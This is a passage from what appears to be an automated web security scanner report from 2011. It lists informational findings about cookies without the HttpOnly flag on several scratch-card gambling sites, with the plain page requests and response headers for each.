Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2fqv2zf00zxxhy45nsxwkkn5; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:10:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: UniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45238


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.113. http://es.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2gztkjbjjhq5j245dm50ad3r; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:44 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: UniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.114. http://es.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gin3f3ve5ssjqvecjgozqu2m; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=94A1C2407036BBC289743D1C0069248E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:34:59 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: UniqueVisitorID=94A1C2407036BBC289743D1C0069248E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.115. http://fi.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wjfbcr2m41ex5r55rhrnngmf; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:20:15 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: UniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: LanguageCode=FIN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48328


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.116. http://fi.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hmgr1d45cnyeul45w4fbbd45; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:45:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: UniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: LanguageCode=FIN; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.117. http://fi.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zn3bsef0l0ekkt45uzojyfea; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:24:05 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: UniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.118. http://fr.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bifmqjz1ktedjhqr1owcwx55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:10 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: UniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.119. http://fr.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5huvzsa0en1qm555mqufug55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:11:03 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: UniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45566


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.120. http://fr.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4pybr5mog1wyq1ypzxg2txmq; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:30:40 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: UniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.121. http://fr.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=33f2gh45mw2dub45vfy4im55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=5402E87C2984227C4B267200D292C2AC&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:13 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: UniqueVisitorID=5402E87C2984227C4B267200D292C2AC; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45099


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.122. http://home.okscratchcards.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.123. http://home.okscratchcards.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.124. http://home.okscratchcards.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36147


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.125. http://home.okscratchcards.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /PlayersClub.aspx

Issue detail

